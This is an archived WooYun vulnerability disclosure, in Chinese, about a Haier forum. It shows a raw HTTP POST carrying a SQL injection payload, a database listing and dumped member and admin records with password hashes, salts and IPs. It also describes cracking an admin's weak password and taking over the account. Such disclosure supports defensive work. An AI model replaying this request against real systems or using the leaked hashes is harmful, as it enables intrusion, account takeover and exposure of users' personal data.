当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-086690

漏洞标题:海尔论坛SQL注入泄漏2w会员信息可修改UC管理员信息

相关厂商:海尔集团

漏洞作者: sm0nk

提交时间:2014-12-10 19:42

修复时间:2015-01-24 19:44

公开时间:2015-01-24 19:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-10: 细节已通知厂商并且等待厂商处理中
2014-12-12: 厂商已经确认,细节仅向厂商公开
2014-12-22: 细节向核心白帽子及相关领域专家公开
2015-01-01: 细节向普通白帽子公开
2015-01-11: 细节向实习白帽子公开
2015-01-24: 细节向公众公开

简要描述:

SQL注入,DZ论坛
数据至少2W
trs_ucenter_members_bak
[8846 entries]
Table: trs_common_member
[2727 entries]
Table: uc_members
[8326 entries]

详细说明:

0.目标站点是tbbs.haier.com 这个论坛跟bbs.haier.com 不是一个论坛。
1.先来个小洞crossdomain.xml file
http://tbbs.haier.com/crossdomain.xml

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>


2.内部IP泄漏的链接
http://tbbs.haier.com/HaierBBS/test.jsp

10.135.103.22 IP:


管理平台
http://tbbs.haier.com/was5/web/login.jsp
3.SQL注入漏洞
注入的时候加个level

POST /HaierBBS/thrdapplycount/gettolcount.do HTTP/1.1
Content-Length: 46
Content-Type: application/x-www-form-urlencoded
Referer: http://tbbs.haier.com/
Cookie: JSESSIONID=C508D821EE8E5CC4B133E91E9FF5D81D.jvm1; idsALUserSource=""
Host: tbbs.haier.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
sourceId=1'%22&type=1%2C5%2C6%2C7%2C8%2C9%2C10


1.jpg


22个数据库

[*] confluence
[*] confluence2
[*] confluence3
[*] confluence4
[*] discuz0719
[*] discuz15
[*] gitlabhq_development
[*] gitlabhq_production
[*] gitlabhq_test
[*] information_schema
[*] logbak
[*] mysql
[*] performance_schema
[*] test
[*] trswcmcluster
[*] trswcmcluster0830
[*] trswcmclustercn
[*] trswcmv65clusterforcn0410
[*] trswcmv65clusterforen
[*] trswcmv65clusterforen1025
[*] trswcmv65clusterforen20131114
[*] trswcmv65plugins


泄漏会员信息,包括用户名、密码、salt、邮箱、手机等
trs_ucenter_members_bak
[8846 entries]
Table: trs_common_member
[2727 entries]
Table: uc_members
[8326 entries]
e.g.

back-end DBMS: MySQL 5.0
Database: discuz15
Table: uc_members
[8326 entries]
+------+---------+---------+--------+--------+-----------------+----------------------------------+----------+------------+--------------------------------------------------------+----------------------------------+-------------+---------------+
| uid  | myid    | myidkey | salt   | babao  | regip           | email                            | secques  | regdate    | username                                               | password                         | lastloginip | lastlogintime |
+------+---------+---------+--------+--------+-----------------+----------------------------------+----------+------------+--------------------------------------------------------+----------------------------------+-------------+---------------+
| 1    | <blank> | <blank> | 170560 | NULL   | 114.245.229.254 | [email protected]                  | <blank>  | 1259818150 | admin                                                  | e6dbb8e9474d11bd3697ba769a18f204 | 0           | 0             |
| 2    | <blank> | <blank> | 63b267 | NULL   | 114.245.229.254 | [email protected]                  | <blank>  | 1259818742 | kllm868                                                | bd4c0638b9e9cea498aeae9684ce3112 | 0           | 0             |
| 8    | <blank> | <blank> | abff79 | NULL   | 114.245.231.251 | [email protected]             | <blank>  | 1259985674 | #aqa                                                   | 7beb4aed0685006f808f51ce537ec55a | 0           | 0             |
| 10   | <blank> | <blank> | 038643 | NULL   | 218.58.70.250   | [email protected]            | <blank>  | 1259992864 | \xe8›‹\xe9\xbb„                                        | a2adcc48ade4bf6c24e1510aa26f0ea3 | 0           | 0             |
| 15   | <blank> | <blank> | 3ac3b3 | NULL   | 210.5.133.19    | [email protected]                  | <blank>  | 1260006611 | s520                                                   | 5c68c562eaa0c48a54f0b587c1c8af7a | 0           | 0             |
| 16   | <blank> | <blank> | 8712f0 | NULL   | 114.245.231.251 | [email protected]             | <blank>  | 1260009400 | 2w2w2w                                                 | b5c32024ea7e703a4ac90536dbc381a7 | 0           | 0             |


2.jpg


4.任意修改UC管理员信息
通过注入漏洞获得trs_ucenter_members_admin 的管理员信息

+--------+---------+---------+--------+---------------+---------------------+--------+---------+------------+----------+----------------------------------+-------------+---------------+
| uid    | myid    | myidkey | salt   | regip         | email               | avatar | secques | regdate    | username | password                         | lastloginip | lastlogintime |
+--------+---------+---------+--------+---------------+---------------------+--------+---------+------------+----------+----------------------------------+-------------+---------------+
| 173356 | <blank> | <blank> | b351e0 | 10.135.103.22 | [email protected] | NULL   | <blank> | 1353657771 | lhtww    | 935af859a07284299ed775479542ff1f | 0           | 0             |
+--------+---------+---------+--------+---------------+---------------------+--------+---------+------------+----------+----------------------------------+-------------+---------------+


虽然密码加salt,但是123456还是能够破解出来的
登录之,可以随意更改信息,绑定手机、更换邮箱等等
VIPuser

3.jpg


5.爆破
http://tuser.haier.com/ids/cn/haier_login.jsp?returnUrl=http://tuser.haier.com/HaierFramework/haier/appuser/vipUser/myhaier.jsp
如果UC管理员密码是123456那么其他人也有可能是123456,不测试了。

漏洞证明:

1.jpg


2.jpg


3.jpg

修复方案:

听说海尔很大方,求多少给多少。。。
1.过滤特殊字符
2.管理员界面做访问限制
3.增强口令(估计用)

版权声明:转载请注明来源 sm0nk@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-12-12 14:06

厂商回复:

感谢乌云平台sm0nk的测试与提醒,我方已安排人员进行处理。

最新状态:

暂无